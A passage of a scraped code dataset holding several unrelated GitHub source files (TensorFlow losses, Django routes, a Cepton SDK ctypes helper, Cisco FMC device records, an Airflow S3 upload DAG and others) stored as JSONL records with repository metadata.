gt\n\n with tf.name_scope('smooth_l1_loss'):\n deltas_abs = tf.abs(diff)\n smoothL1_sign = tf.cast(tf.less(deltas_abs, 1.0 / sigma2), tf.float32)\n return tf.reduce_mean(tf.square(diff) * 0.5 * sigma2 * smoothL1_sign + \\\n (deltas_abs - 0.5 / sigma2) * tf.abs(smoothL1_sign - 1))\n\ndef compute_cls_acc(pred, gt, mask):\n\n zero = tf.zeros_like(pred, tf.float32)\n one = tf.ones_like(pred, tf.float32)\n\n pred = tf.where(pred < 0.3, x=zero, y=one)\n acc = tf.reduce_mean(tf.cast(tf.equal(pred * mask, gt * mask), tf.float32))\n\n return acc\n\n\ndef compute_loss(binarize_map, threshold_map, thresh_binary,\n gt_score_maps, gt_threshold_map, gt_score_mask, gt_thresh_mask):\n\n binarize_loss = dice_coefficient_loss(gt_score_maps, binarize_map, gt_score_mask)\n threshold_loss = l1_loss(threshold_map, gt_threshold_map, gt_thresh_mask)\n thresh_binary_loss = dice_coefficient_loss(gt_score_maps, thresh_binary, gt_score_mask)\n\n model_loss = cfg.TRAIN.LOSS_ALPHA * binarize_loss + cfg.TRAIN.LOSS_BETA * threshold_loss + thresh_binary_loss\n\n tf.summary.scalar('losses/binarize_loss', binarize_loss)\n tf.summary.scalar('losses/threshold_loss', threshold_loss)\n tf.summary.scalar('losses/thresh_binary_loss', thresh_binary_loss)\n return model_loss\n\ndef compute_acc(binarize_map, threshold_map, thresh_binary,\n gt_score_maps, gt_threshold_map, gt_score_mask, gt_thresh_mask):\n binarize_acc = compute_cls_acc(binarize_map, gt_score_maps, gt_score_mask)\n thresh_binary_acc = compute_cls_acc(thresh_binary, gt_score_maps, gt_score_mask)\n\n tf.summary.scalar('acc/binarize_acc', binarize_acc)\n tf.summary.scalar('acc/thresh_binary_acc', thresh_binary_acc)\n\n return binarize_acc, thresh_binary_acc\n\n\n\n","repo_name":"iamrishab/DB-tf","sub_path":"lib/networks/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"77"} +{"seq_id":"43092728665","text":"from django.urls import path\r\nfrom . import api\r\n\r\napp_name='umrah'\r\n\r\nurlpatterns = [\r\n path(\"hegg/trips/\",api.HeggListView.as_view(),name='Filtered hegg'),\r\n path(\"hegg/trips/\",api.heggdetails,name='tripin details'),\r\n path(\"hegg/\",api.MODELItemViewSet.as_view({'get': 'list'}),name='range hegg'),\r\n path(\"umrah/\",api.MODELItemViewSet.as_view({'get': 'list'}),name='range umrah'),\r\n path(\"umrah/trips/\",api.TripListView.as_view(),name='Filtered umrah'),\r\n path(\"umrah/trips/\",api.umrahdetails,name='umrah details'),\r\n]","repo_name":"sa2r851/travel-app","sub_path":"myproject/umrah/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6869333917","text":"import requests\n\n\ndef send(uri, payload):\n request = requests.get(uri, params=payload)\n result = request.json()\n error = result.get('error')\n if error:\n error_code = result.get('error').get('error_code')\n error_msg = result.get('error').get('error_msg')\n url = request.url\n raise ValueError(f\"error_code={error_code} - error_msg={error_msg} - url={url}\")\n return result\n","repo_name":"mnmyasis/ditexos","sub_path":"ditexos/vk/services/vk_ads/_send.py","file_name":"_send.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"47469587426","text":"# [2, 3, 6, 7,1] and target 7 => [[7], [2,2,3]]\n\ndef combinationSum(a: list(), target: int):\n res = []\n\n def dfs(i, cur, total):\n if total == target:\n res.append(cur.copy())\n return\n\n if i >= len(a) or total > target:\n return\n\n cur.append(a[i])\n dfs(i, cur, total + a[i])\n cur.pop()\n dfs(i+1, cur, total)\n\n dfs(0, [], 0)\n return res\n\n\na = [2, 3, 6, 7]\ntarget = 7\nprint(combinationSum(a, target))\n","repo_name":"RuntimeTerror-404/leetcode-easy_medium","sub_path":"39.py","file_name":"39.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"36894514055","text":"# -*- coding:utf-8 -*-\nfrom jinstall.centos7.utils.Tool import *\n\n\nclass SyGo:\n # 配置go环境\n @staticmethod\n def install_go(params: dict):\n \"\"\"安装语言golang\"\"\"\n Tool.check_local_files([\n 'resources/lang/go/go1.14.4.linux-amd64.tar.gz',\n ])\n Tool.upload_file_fabric({\n '/resources/lang/go/go1.14.4.linux-amd64.tar.gz': 'remote/go1.14.4.linux-amd64.tar.gz',\n })\n with cd(install_configs['path.package.remote']):\n run('mkdir /usr/local/gopath && mkdir /usr/local/gocache')\n run('tar -zxf go1.14.4.linux-amd64.tar.gz')\n run('mv go/ /usr/local')\n run('rm -rf go1.14.4.linux-amd64.tar.gz')\n","repo_name":"a07061625/swooleyaf_install","sub_path":"jinstall/centos7/tools/SyGo.py","file_name":"SyGo.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"21063151197","text":"# This work is based on original code developed and copyrighted by TNO 2020.\r\n# Subsequent contributions are licensed to you by the developers of such code and are\r\n# made available to the Project under one or several contributor license agreements.\r\n#\r\n# This work is licensed to you under the Apache License, Version 2.0.\r\n# You may obtain a copy of the license at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Contributors:\r\n# TNO - Initial implementation\r\n# Manager:\r\n# TNO\r\n\r\nfrom dataclasses import dataclass, field, asdict\r\nfrom extensions.vue_backend.messages.DLA_table_data_message import DLA_table_data_response\r\n\r\n@dataclass\r\nclass childclass():\r\n a: int\r\n\r\n@dataclass\r\nclass test():\r\n a: int = field(default=3)\r\n b: str = field(default='b')\r\n c: str = 'x'\r\n d: dict = field(default_factory=dict)\r\n e: list = field(default_factory=list)\r\n f: childclass = field(default=None)\r\n\r\nif __name__ == '__main__':\r\n r = DLA_table_data_response()\r\n print(r)\r\n\r\n t = test(0, 'a')\r\n print(t)\r\n # test default values\r\n t = test()\r\n print(t)\r\n\r\n # use dataclasses as subclasses, they serialize realy nice\r\n t = test(f=childclass(2))\r\n\r\n # instantiate a dataclass based on a dict\r\n dict_test = dict()\r\n dict_test['a'] = 2\r\n dict_test['b'] = 'x'\r\n dict_test['c'] = 'y'\r\n dict_test['d'] = {'a': 3}\r\n dict_test['e'] = [0, 1]\r\n dict_test['f'] = None\r\n print(dict_test)\r\n y = test(**dict_test)\r\n print(y)\r\n\r\n # convert it back to a dict\r\n dict_y = asdict(y)\r\n print(dict_test == dict_y)\r\n\r\n # work with list and dicts inside a dataclass\r\n y.e.append('a')\r\n y.d['test'] = 'works'\r\n y.f = childclass(3)\r\n\r\n dict_y = asdict(y)\r\n print(y)\r\n print(dict_y)\r\n print(list(dict_y.values()))\r\n\r\n\r\n\r\n","repo_name":"ESDLMapEditorESSIM/esdl-mapeditor","sub_path":"tests/dataclass_example.py","file_name":"dataclass_example.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14181867651","text":"import os\n\nlistOfShame = [] \n\nwhile True: \n menu = input(\"Add or Remove or Exit? \\n press a to add, r to remove, q or e to exit: \") \n\n if(menu.strip().lower()[0]==\"a\"): \n \n name = input(\"What is your name? \")\n age = input(\"What is your age? \")\n pref = input(\"What is your computer platform? \")\n \n row = [name, age, pref] \n \n listOfShame.append(row) \n \n elif(menu.strip().lower()[0]=='r' ):\n name = input(\"What is the name of the record to delete?\") \n \n for r in listOfShame:\n if name in r: \n listOfShame.remove(r) # remove the whole row if name is in it\n elif(menu.strip().lower()[0]=='q' or menu.strip().lower()[0]=='e' ): \n print('-------- ended ------')\n break\n else:\n os.system('cls')\n print('---Wrong Input ----')\n exit()\n\n\n\nprint(listOfShame)\n","repo_name":"johnpauljpc/100-Days-of-Code","sub_path":"day44.py","file_name":"day44.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36843977020","text":"import ctypes\nimport os\nimport os.path\nimport platform\nimport pprint\nimport sys\nfrom ctypes import *\n\nimport numpy\n\nimport cepton_util.common\n\n_all_builder = cepton_util.common.AllBuilder(__name__)\n\n# ------------------------------------------------------------------------------\n# Load library\n# ------------------------------------------------------------------------------\n\n\ndef load_c_library(parent_dir, name):\n if sys.platform.startswith(\"linux\"):\n if platform.machine().startswith(\"armv\"):\n os_name = \"linux-arm\"\n else:\n os_name = \"linux-{}\".format(platform.machine())\n lib_name = \"lib{}.so\".format(name)\n elif sys.platform.startswith(\"darwin\"):\n os_name = \"osx\"\n lib_name = \"lib{}.dylib\".format(name)\n elif sys.platform.startswith(\"win\"):\n os_name = \"win64\"\n lib_name = \"{}.dll\".format(name)\n else:\n raise NotImplementedError(\"Platform not supported!\")\n lib_dir = \"lib/{}/\".format(os_name)\n\n # Try local and global search paths\n path = os.path.join(parent_dir, lib_dir, lib_name)\n if not os.path.exists(path):\n path = lib_name\n return CDLL(path)\n\n\ndef check_c_size(lib, c_type, var_name):\n expected_size = c_size_t.in_dll(lib, var_name).value\n if sizeof(c_type) != expected_size:\n raise RuntimeError(\"{} has size {} (expected {})!\".format(\n c_type, sizeof(c_type), expected_size))\n\n\ndef from_bytes(c_type, buffer):\n assert (sizeof(c_type) <= len(buffer))\n c_value = c_type()\n memmove(addressof(c_value), buffer, sizeof(c_value))\n return c_value\n\n\ndef to_bytes(c_value):\n buffer = create_string_buffer(sizeof(c_value))\n memmove(buffer, addressof(c_value), sizeof(c_value))\n return buffer\n\n# ------------------------------------------------------------------------------\n# Structures\n# ------------------------------------------------------------------------------\n\n\ndef c_struct_to_dict(c_obj):\n data = {}\n for field in c_obj._fields_:\n name = field[0]\n data[name] = getattr(c_obj, name)\n return data\n\n\ndef print_c_struct(c_obj):\n data = c_struct_to_dict(c_obj)\n pprint.pprint(data)\n\n\ndef update_c_struct_from_dict(c_obj, d):\n valid = set([])\n for field in c_obj._fields_:\n name = field[0]\n if name in d:\n value = getattr(c_obj, name)\n assert (not isinstance(value, Array))\n setattr(c_obj, name, d[name])\n valid.add(name)\n invalid = set(d.keys()) - valid\n if invalid:\n raise AttributeError(\"invalid keys: {}\".format(invalid))\n\n\n# ------------------------------------------------------------------------------\n# Arrays\n# ------------------------------------------------------------------------------\n_C_NDARRAY_REQUIREMENTS = [\"C_CONTIGUOUS\", \"ALIGNED\", \"WRITEABLE\", \"OWNDATA\"]\n\n\ndef get_c_ndpointer_type(dtype, ndim=1):\n return numpy.ctypeslib.ndpointer(\n dtype=dtype, ndim=ndim, flags=_C_NDARRAY_REQUIREMENTS)\n\n\ndef get_c_ndarray(a, **kwargs):\n return numpy.require(a, requirements=_C_NDARRAY_REQUIREMENTS, **kwargs)\n\n\ndef create_c_ndarray(size, dtype):\n a = numpy.zeros(size, dtype)\n return get_c_ndarray(a)\n\n\ndef convert_bytes_to_ndarray(a_bytes, c_type):\n \"\"\"Convert numpy bytes array to numpy array\"\"\"\n dtype = numpy.dtype(c_type)\n assert (sizeof(c_type) == dtype.itemsize)\n a = numpy.frombuffer(a_bytes, dtype)\n assert (len(a) == len(a_bytes) / sizeof(c_type))\n return a\n\n\ndef convert_ndarray_to_bytes(a):\n \"\"\"Convert numpy array to numpy bytes array\"\"\"\n return a.view(numpy.uint8)\n\n\ndef convert_c_array_to_ndarray(n, c_a):\n \"\"\"Convert ctypes pointer to numpy array\"\"\"\n assert(isinstance(c_a, ctypes._Pointer))\n c_type = c_a._type_\n n_bytes = n * sizeof(c_type)\n a_bytes = \\\n numpy.ctypeslib.as_array(cast(c_a, POINTER(c_byte)), shape=(n_bytes,))\n return convert_bytes_to_ndarray(a_bytes, c_type)\n\n\ndef convert_ndarray_to_c_array(a):\n \"\"\"Convert numpy array to ctypes pointer\"\"\"\n c_type = a.dtype\n a_bytes = convert_ndarray_to_bytes(a)\n assert (len(a_bytes) == len(a) * sizeof(c_type))\n c_a_bytes = numpy.ctypeslib.as_ctypes(a_bytes)\n c_a = cast(c_a_bytes, POINTER(c_type))\n return c_a\n\n\ndef unpack_bits(a):\n \"\"\"Convert array of integers to array of bool\"\"\"\n if a.size == 0:\n return numpy.zeros(list(a.shape) + [a.dtype.itemsize * 8], dtype=bool)\n bits = numpy.unpackbits(a.flatten().view(numpy.uint8)).astype(bool)\n bits = bits.reshape([-1, 8])[:, ::-1]\n bits = bits.reshape(list(a.shape) + [-1])\n return bits\n\n\ndef pack_bits(bits, c_type):\n dtype = numpy.dtype(c_type)\n if bits.size == 0:\n return numpy.zeros(bits.shape[:-1], dtype=dtype)\n # bits = bits_tmp.reshape([-1, 8])[:, ::-1]\n a = numpy.packbits(bits.flatten()).view(dtype)\n a = numpy.reshape([bits.shape[:-1]])\n return a\n\n\n__all__ = _all_builder.get()\n","repo_name":"ceptontech/cepton_sdk_redist","sub_path":"python/cepton_sdk/common/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":4928,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"77"} +{"seq_id":"45453854756","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport welib.weio as weio # https://github.com/ebranlard/weio\r\n\r\n# Local \r\nfrom wtDigiTwin.ws_estimator.tabulated import TabulatedWSEstimator\r\n\r\nIStudy=[1,3]\r\n\r\n\r\nif 1 in IStudy:\r\n try:\r\n os.mkdir('../../_data/wsest/')\r\n except:\r\n pass\r\n relaxation=0.3\r\n base='../../_data/NREL5MW'\r\n Main='../../_data/NREL5MW_SimpleSimulations/TurbWindStep_AllDOF.fst'; \r\n # --- Turbine data and estimator\r\n wse = TabulatedWSEstimator(fst_file=Main)\r\n wse.load_files(base=base,suffix='')\r\n print(wse)\r\n # --- Loading data\r\n df = weio.read(Main.replace('.fst','.outb')).toDataFrame()\r\n time = df['Time_[s]']\r\n TTvx = df['NcIMUTVxs_[m/s]']\r\n ws_ref = df['RtVAvgxh_[m/s]'] # Rotor avg\r\n pitch = df['BldPitch1_[deg]']\r\n Qaero_ref = df['RtAeroMxh_[N-m]']\r\n omega = df['RotSpeed_[rpm]']*2*np.pi/60 # rad/s\r\n lambda_ref=omega*wse.R/ws_ref\r\n Qaero = wse.Torque(ws_ref,pitch,omega)\r\n Thrust = wse.Thrust(ws_ref,pitch,omega)\r\n # ----\r\n print('Estimating...')\r\n ws_est=np.zeros(omega.shape)\r\n print(ws_est.shape)\r\n WS0=ws_ref[0]*0.9 # estimate previous time step\r\n for i,(Qa,p,o,ws0) in enumerate(zip(Qaero_ref,pitch,omega,ws_ref)):\r\n ws_hat=wse.estimate(Qa, p, o, WS0,relaxation=relaxation)\r\n ws_est[i]=ws_hat\r\n WS0=ws_hat\r\n if np.mod(i,1000)==0:\r\n print(i,len(ws_ref),'{:4.1f} {:4.1f}'.format(ws_ref[i],ws_est[i]))\r\n\r\n Qaero2 = wse.Torque(ws_est,pitch,omega)\r\n # --- Export\r\n M=np.column_stack((time,ws_ref,ws_est,Qaero_ref,Qaero,Qaero2,omega,pitch))\r\n header='time,ws_ref,ws,Qaero_ref,Qaero,Qaero2,omega,pitch'\r\n np.savetxt('../../_data/wsest/_{:.1f}.csv'.format(relaxation),M,delimiter=',',header=header)\r\n\r\nif 3 in IStudy:\r\n base='../../_data/NREL5MW'\r\n #Main='../../_data/NREL5MW_SimpleSimulations/TurbWindStep_AllDOF.fst'; \r\n Main='../../_data/NREL5MW/Main_Onshore.fst'; \r\n wse = TabulatedWSEstimator(fst_file=Main)\r\n wse.load_files(base=base,suffix='')\r\n print(wse)\r\n# \r\nplt.show()\r\n\r\n","repo_name":"ebranlard/welib","sub_path":"welib/kalman/examples/onshore_YAMS/100_WSEstimation.py","file_name":"100_WSEstimation.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"77"} +{"seq_id":"19044136796","text":"import pickle\nimport scipy.stats\nimport os\nimport collections\nimport numpy as np\n\nimport network_io\nimport complete_invariant_dicts\nimport plotting\nimport pipeline\nimport network_construction\n\ndef find_numbers_of_isomorphism_classes():\n example_nets_folder = '???'\n sizes = [(2,2),(3,2),(4,2),(2,3),(3,3)]\n counts = dict()\n for size in sizes:\n with open(example_nets_folder+str(size[0])+'_'+str(size[1])+'.pickle','r') as f:\n d = pickle.load(f)\n counts[size] = len(d)\n del d\n return counts\n \ndef t_tests_for_two_dict_lists(list1,list2,equal_var=False,map_ni_to_nli=False,nnodes=-1,nlayers=-1):\n invariants = set()\n layersets = set()\n \n if map_ni_to_nli:\n example_nets_filename = '???'\n invdicts = complete_invariant_dicts.load_example_nets_file(example_nets_filename)\n list1,invariants1,mapped_invdicts1 = plotting.ni_to_nli(list1,invdicts)\n list2,invariants2,mapped_invdicts2 = plotting.ni_to_nli(list2,invdicts)\n invariants = invariants1.union(invariants2)\n \n \n for compinv_dict in list1:\n for compinv in compinv_dict:\n if not map_ni_to_nli:\n invariants.add(compinv)\n layersets.update([layerset for layerset in compinv_dict[compinv]])\n for compinv_dict in list2:\n for compinv in compinv_dict:\n if not map_ni_to_nli:\n invariants.add(compinv)\n layersets.update([layerset for layerset in compinv_dict[compinv]])\n \n layersets = list(layersets)\n layersets.sort()\n \n results = collections.defaultdict(dict)\n \n for compinv in invariants:\n for layerset in layersets:\n temp_layerset_vals_1 = []\n for compinv_dict in list1:\n if compinv in compinv_dict:\n temp_layerset_vals_1.append(compinv_dict[compinv].get(layerset,0))\n else:\n temp_layerset_vals_1.append(0)\n temp_layerset_vals_2 = []\n for compinv_dict in list2:\n if compinv in compinv_dict:\n temp_layerset_vals_2.append(compinv_dict[compinv].get(layerset,0))\n else:\n temp_layerset_vals_2.append(0)\n \n results[compinv][layerset] = scipy.stats.ttest_ind(temp_layerset_vals_1,temp_layerset_vals_2,equal_var=equal_var)\n \n return results\n\n\n\n#################### Basic properties ######################################################################################################\n\ndef find_number_and_weights_of_interlayer_edges(network):\n number_of_interlayer_edges = 0\n weights = []\n for edge in list(network.edges):\n if edge[2] != edge[3]:\n number_of_interlayer_edges = number_of_interlayer_edges + 1\n weights.append(edge[4])\n return number_of_interlayer_edges,weights\n \ndef find_all_interlayer_information(network):\n number_of_interlayer_edges = 0\n weights = []\n intersections = []\n unions = []\n sizes = []\n for edge in list(network.edges):\n if edge[2] != edge[3]:\n number_of_interlayer_edges = number_of_interlayer_edges + 1\n weights.append(edge[4])\n if edge[2] < edge[3]:\n A = set(eval(edge[0]))\n B = set(eval(edge[1]))\n else:\n A = set(eval(edge[1]))\n B = set(eval(edge[0]))\n intersections.append(A.intersection(B))\n unions.append(A.union(B))\n sizes.append((len(A),len(B)))\n return number_of_interlayer_edges,weights,intersections,unions,sizes\n\ndef find_in_and_out_degrees(M,layer):\n # Assumes layers are numbered with consecutive integers and considers only edges from layer+-1 to layer\n in_degrees = []\n out_degrees = []\n for node in M.iter_nodes(layer=layer):\n in_degree = 0\n out_degree = 0\n for neighbor in list(M[node,layer]):\n if neighbor[1] == layer - 1:\n in_degree = in_degree + 1\n elif neighbor[1] == layer + 1:\n out_degree = out_degree + 1\n in_degrees.append(in_degree)\n out_degrees.append(out_degree)\n return in_degrees,out_degrees\n\ndef find_cluster_sizes(M,layer):\n cluster_sizes = []\n for node in M.iter_nodes(layer=layer):\n voxellist = eval(node)\n cluster_sizes.append(len(voxellist))\n return cluster_sizes\n\n\n\n#################### Aggregation and null model p values ###################################################################################\n\ndef t_tests_for_aggregated_dicts(compinvdict1,compinvdict2):\n assert set(compinvdict1.keys()) == set(compinvdict2.keys())\n results = dict()\n for compinv in compinvdict1:\n results[compinv] = scipy.stats.ttest_ind(compinvdict1[compinv],compinvdict2[compinv],equal_var=False)\n return results\n\ndef aggregated_ni_to_nli(compinvdict,examples_dict):\n nli_dict = collections.defaultdict(list)\n for compinv in compinvdict:\n nl_complete_invariant = network_io.pn.get_complete_invariant(examples_dict[compinv],allowed_aspects='all')\n nli_dict[nl_complete_invariant].extend(compinvdict[compinv])\n return nli_dict\n","repo_name":"ercco/multilayer-brains","sub_path":"code/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":5252,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"42516783588","text":"\"\"\"Device Records Classes.\"\"\"\n\nfrom fmcapi.api_objects.apiclasstemplate import APIClassTemplate\nfrom fmcapi.api_objects.policy_services.accesspolicies import AccessPolicies\nfrom fmcapi.api_objects.status_services import TaskStatuses\nimport time\nimport logging\n\n\nclass DeviceRecords(APIClassTemplate):\n \"\"\"The DeviceRecords Object in the FMC.\"\"\"\n\n VALID_JSON_DATA = [\n \"id\",\n \"name\",\n \"type\",\n \"hostName\",\n \"natID\",\n \"regKey\",\n \"license_caps\",\n \"performanceTier\",\n \"accessPolicy\",\n ]\n VALID_FOR_KWARGS = VALID_JSON_DATA + [\n \"acp_name\",\n \"acp_id\",\n \"model\",\n \"modelId\",\n \"modelNumber\",\n \"modelType\",\n \"healthStatus\",\n \"healthPolicy\",\n \"type\",\n \"version\",\n \"sw_version\",\n \"deviceGroup\",\n \"prohibitPacketTransfer\",\n \"keepLocalEvents\",\n \"ftdMode\",\n \"keepLocalEvents\",\n ]\n URL_SUFFIX = \"/devices/devicerecords\"\n REQUIRED_FOR_POST = [\"accessPolicy\", \"hostName\", \"regKey\", \"type\"]\n REQUIRED_FOR_PUT = [\"id\"]\n LICENSES = [\n \"BASE\",\n \"THREAT\",\n \"URLFilter\",\n \"MALWARE\",\n \"APEX\",\n \"PLUS\",\n \"VPNOnly\",\n \"INSTANCE\",\n ]\n TIERS = [\"FTDv5\", \"FTDv10\", \"FTDv20\", \"FTDv30\", \"FTDv50\", \"FTDv100\", \"Legacy\"]\n\n def __init__(self, fmc, **kwargs):\n \"\"\"\n Initialize DeviceRecords object.\n\n :param fmc (object): FMC object\n :param **kwargs: Any other values passed during instantiation.\n :return: None\n \"\"\"\n super().__init__(fmc, **kwargs)\n logging.debug(\"In __init__() for DeviceRecords class.\")\n self.parse_kwargs(**kwargs)\n\n def parse_kwargs(self, **kwargs):\n \"\"\"\n Parse the kwargs and set self variables to match.\n\n :return: None\n \"\"\"\n super().parse_kwargs(**kwargs)\n logging.debug(\"In parse_kwargs() for DeviceRecords class.\")\n if \"acp_name\" in kwargs:\n self.acp(name=kwargs[\"acp_name\"])\n\n def licensing(self, action, name=\"BASE\"):\n \"\"\"\n Associate licenses with this device record.\n\n :param action: (str) 'add', 'remove', 'clear'\n :param name: (str) Value from LICENSES constant.\n :return: None\n \"\"\"\n logging.debug(\"In licensing() for DeviceRecords class.\")\n if action == \"add\":\n if name in self.LICENSES:\n if \"license_caps\" in self.__dict__:\n self.license_caps.append(name)\n self.license_caps = list(set(self.license_caps))\n else:\n self.license_caps = [name]\n logging.info(f'License \"{name}\" added to this DeviceRecords object.')\n\n else:\n logging.warning(\n f\"{name} not found in {self.LICENSES}. Cannot add license to DeviceRecords.\"\n )\n elif action == \"remove\":\n if name in self.LICENSES:\n if \"license_caps\" in self.__dict__:\n try:\n self.license_caps.remove(name)\n except ValueError:\n logging.warning(\n f\"{name} is not assigned to this devicerecord thus cannot be removed.\"\n )\n logging.info(\n f'License \"{name}\" removed from this DeviceRecords object.'\n )\n else:\n logging.warning(\n f\"{name} is not assigned to this devicerecord thus cannot be removed.\"\n )\n\n else:\n logging.warning(\n f\"{name} not found in {self.LICENSES}. Cannot remove license from DeviceRecords.\"\n )\n elif action == \"clear\":\n if \"license_caps\" in self.__dict__:\n del self.license_caps\n logging.info(\"All licensing removed from this DeviceRecords object.\")\n\n def tiering(self, action, name=\"\"):\n \"\"\"\n Associate performance tier with this device record.\n\n :param action: (str) 'add', 'remove', 'clear'\n :param name: (str) Value from TIERS constant.\n :return: None\n \"\"\"\n logging.debug(\"In tiering() for DeviceRecords class.\")\n if self.fmc.serverVersion < \"7.0\":\n logging.warning(\n f\"FTD performance tier licenses are supported only in FMC version 7.0 and newer.\"\n )\n else:\n if action == \"add\":\n if name in self.TIERS:\n self.performanceTier = name\n logging.info(\n f'Performance tier \"{name}\" added to this DeviceRecords object.'\n )\n else:\n logging.warning(\n f\"{name} not found in {self.TIERS}. Cannot add performance tier to DeviceRecords.\"\n )\n elif action == \"remove\":\n if name in self.TIERS:\n if \"performanceTier\" in self.__dict__:\n try:\n self.performanceTier = \"\"\n except ValueError:\n logging.warning(\n f\"{name} performance tier cannot be removed.\"\n )\n logging.info(\n f'License \"{name}\" removed from this DeviceRecords object.'\n )\n else:\n logging.warning(\n f\"{name} is not assigned to this DeviceRecords thus cannot be removed.\"\n )\n\n else:\n logging.warning(\n f\"{name} not found in {self.TIERS}. Cannot remove performance tier from DeviceRecords.\"\n )\n elif action == \"clear\":\n if \"performanceTier\" in self.__dict__:\n del self.performanceTier\n logging.info(\n \"Performance tier removed from this DeviceRecords object.\"\n )\n\n def acp(self, name=\"\"):\n \"\"\"\n Associate AccessPolicy with this device.\n\n :param name: (str) Name of ACP.\n :return: None\n \"\"\"\n logging.debug(\"In acp() for DeviceRecords class.\")\n acp = AccessPolicies(fmc=self.fmc)\n acp.get(name=name)\n if \"id\" in acp.__dict__:\n self.accessPolicy = {\"id\": acp.id, \"type\": acp.type}\n else:\n logging.warning(\n f\"Access Control Policy {name} not found. Cannot set up accessPolicy for DeviceRecords.\"\n )\n\n def wait_for_task(self, task, wait_time=10):\n \"\"\"\n Pause configuration script and wait for device registration to complete.\n\n :param task: (dict) task[\"id\": (str)]\n :param wait_time: (int) Seconds to wait before rechecking.\n :return: None\n \"\"\"\n task_completed_states = [\"Success\", \"SUCCESS\", \"COMPLETED\"]\n try:\n status = TaskStatuses(fmc=self.fmc, id=task[\"id\"])\n current_status = status.get()\n \"\"\"\n Task Status for new device registration behaves differently than other tasks\n On new device registration, a task is sent for the initial registration. After completion\n the UUID is deleted without any change in task status. So we check to see if the object no longer exists\n to assume the registration is complete. After registration, discovery of the device begins, but there is\n no way to check for this with a task status. The device can't be modified during this time, but a new\n device registration can begin.\n\n OTOH, a device HA operation will update its status to \"Success\" on completion. Hence the two different\n checks.\n \"\"\"\n while (\n current_status[\"status\"] is not None\n and current_status[\"status\"] not in task_completed_states\n ):\n # Lot of inconsistencies with the type of data a task can return\n if \"taskType\" in current_status.keys():\n logging.info(\n f\"Task: {current_status['taskType']} {current_status['status']} {current_status['id']}\"\n )\n time.sleep(wait_time)\n current_status = status.get()\n else:\n logging.info(\n f\"Task: {current_status['status']} {current_status['id']}\"\n )\n time.sleep(wait_time)\n current_status = status.get()\n logging.info(f\"Task: {current_status['status']} {current_status['id']}\")\n except Exception as e:\n logging.info(type(e), e)\n\n def post(self, **kwargs):\n \"\"\"POST to FMC API.\"\"\"\n logging.debug(\"In post() for DeviceRecords class.\")\n response = super().post(**kwargs)\n # self.wait_for_task(task=response[\"metadata\"][\"task\"], wait_time=30) # Doesn't work yet.\n if \"post_wait_time\" in kwargs:\n self.post_wait_time = kwargs[\"post_wait_time\"]\n else:\n self.post_wait_time = 300\n logging.info(\n f\"DeviceRecords registration task submitted. \"\n f\"Waiting {self.post_wait_time} seconds for it to complete.\"\n )\n time.sleep(self.post_wait_time)\n return response\n","repo_name":"marksull/fmcapi","sub_path":"fmcapi/api_objects/device_services/devicerecords.py","file_name":"devicerecords.py","file_ext":"py","file_size_in_byte":9636,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"77"} +{"seq_id":"34420254805","text":"\"\"\"\nDAG #2: This DAG is a compilation and arrangement of tasks to copy data from files stored into an S3 bucket and\ninsert it into the Redshift staging tables.\n\"\"\"\nimport os\nimport logging\nfrom datetime import datetime, timedelta\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom operators import (RenderToS3Operator)\n\nLOCAL_DIR='/Users/leandroarruda/Codes/UdacityCapstoneDEng/data/'\n\ndefault_args = {\n 'owner': 'Leo Arruda',\n 'start_date': datetime(2021, 1, 1),\n 'depends_on_past': False,\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 3,\n 'retry_delay': timedelta(minutes=5)\n}\n\ndag = DAG('NYC_TLC_UPLOAD_FILES_DAG',\n default_args=default_args,\n description='Load Precipitation and Taxi Zones data to S3 for processing',\n schedule_interval='@monthly',\n catchup=False,\n tags=['Load', 'Dataset', 'S3'],\n )\n\ncontent_list = os.listdir(LOCAL_DIR)\ndir_list = filter(\n lambda x: os.path.isdir(\n os.path.join(LOCAL_DIR, x)), content_list)\n\nlogging.info('Uploading : {}'.format(dir_list))\n\nprint('Uploading : {}'.format(dir_list))\n\nstart_upload = DummyOperator(\n task_id='Upload_To_S3_Start', dag=dag)\n\nend_upload = DummyOperator(\n task_id='Upload_To_S3_Finalized', dag=dag)\n\nrender_to_s3 = RenderToS3Operator(\n task_id='Render_To_S3',\n dag=dag,\n local_output=False,\n migrate_output=True,\n local_output_data_path=LOCAL_DIR,\n s3_bucket_name_prefix='udacity-data-lake',\n data_folders=dir_list,\n input_data_path=LOCAL_DIR,\n aws_connection_id='aws_credentials',\n aws_default_region='us-east-2',\n)\n\nstart_upload >> render_to_s3 >> 